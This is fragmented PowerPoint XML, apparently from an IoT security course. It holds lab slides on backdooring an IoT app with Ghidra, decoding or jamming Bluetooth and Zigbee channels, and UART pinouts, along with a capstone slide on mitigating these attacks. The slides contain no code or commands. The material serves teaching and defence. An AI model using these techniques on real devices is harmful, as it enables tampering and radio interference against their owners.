          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>152</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25862132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2" y="234484"/>
            <a:ext cx="11979348" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Introduce a backdoor in an IoT based application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2299854"/>
            <a:ext cx="11582400" cy="420327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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, change the app. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Reinstall via update or download.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How can a bad guy distribute these attacks at scale?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B23505CA-3F2F-D54D-A12B-1A79B0799CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>153</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24453827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89" y="720974"/>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14,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Attacks on other radios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8215D7-0A94-094D-9DEA-C63F3FFEA4A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>154</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13515626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36817"/>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Bluetooth</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Uses 2.4 GHz ISM band spread spectrum radio (2400 – 2483.5 MHz) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hops ever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Slot is 625 u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Packets 1, 3 or 5 slots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Each device has 48 bit address (BD_ADDR)</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Phases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Inquire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Paging (establish connection)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Active/sniff/hold/park</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bonding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC928268-5A75-774E-B385-CA4051BFF669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>155</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB6896A9-9D5D-8F49-8F50-394F5CA1A8C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8309575" y="5987018"/>
            <a:ext cx="2435282" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credit: tutorialspoint</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44F7BACF-4DE6-8A48-B03A-DF7614B0B329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7146560" y="2849217"/>
            <a:ext cx="4964158" cy="2829570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37259245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0"/>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Decode/jam a Bluetooth channel</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John</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC928268-5A75-774E-B385-CA4051BFF669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>156</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20027685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795" y="0"/>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Zigbee</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Zigbee protocol based on 802.15.4 MAC and PHY layers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>2.4 GHz, 16 channels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Each device has 64 bit address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>O-QSPK modulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>250 kbps, CSMA-CA or GTS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Three roles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Coordinator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Router</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>End device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE6B468-2579-F948-B473-743F31994152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>157</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1025" name="Picture 1" descr="page10image1439357520">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AA93A5D-6DE2-DC45-ABD7-9B2CDC3481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2720" y="2344557"/>
            <a:ext cx="5669280" cy="4046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7E0082-0B06-CE47-9D0F-8FC6C879B470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620000" y="6433857"/>
            <a:ext cx="2231701" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credit: Element 14</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308594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291" y="57013"/>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Decode/jam a Zigbee channel</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John</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE6B468-2579-F948-B473-743F31994152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>158</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41553062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36128"/>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Capstone 1: Detect, mitigate or prevent each of the attacks in the labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639694" y="2411897"/>
            <a:ext cx="10881746" cy="373289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OK, there’s a lot here; so any set of mitigations would help including those that exploit scale.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Once you’ve mitigated, speculate on how hard it is for an attacker to overcome your mitigation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Try to set up a framework, using your mitigations, to determine the overall security resilience of an IoT system that uses them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BFB9733-E88D-2249-99CB-86CCE751B039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>159</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2535266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 – details, 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1345966"/>
            <a:ext cx="11582400" cy="130386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UART Connections  (Try to find them yourself first.)</a:t>
            </a:r>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D78A4592-6A69-4940-AC15-9BDAAF0BA4AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C7BFE93-AD1D-804E-9823-ACD50E5A3BF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8364113" y="3494028"/>
            <a:ext cx="1980029" cy="286232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Vcc</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pt-BR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rx</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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pt-BR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gnd</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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Tx</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Power connector</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760B66D1-1949-3D4A-932B-A379472AC564}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="540328" y="1870363"/>
            <a:ext cx="6280727" cy="4710545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CD7293A-78CF-F846-8773-C62B996B5437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6096000" y="5529497"/>
            <a:ext cx="2170545" cy="608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068F23C-C714-8048-872A-792C486FDC73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5721927" y="2998937"/>
            <a:ext cx="1334656" cy="1396511"/>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16B6AE-5C3F-884F-8520-5635A494FB46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8103747" y="2545784"/>
            <a:ext cx="188192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UART connector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{543918A7-F353-DD4D-B2D2-28290649E283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
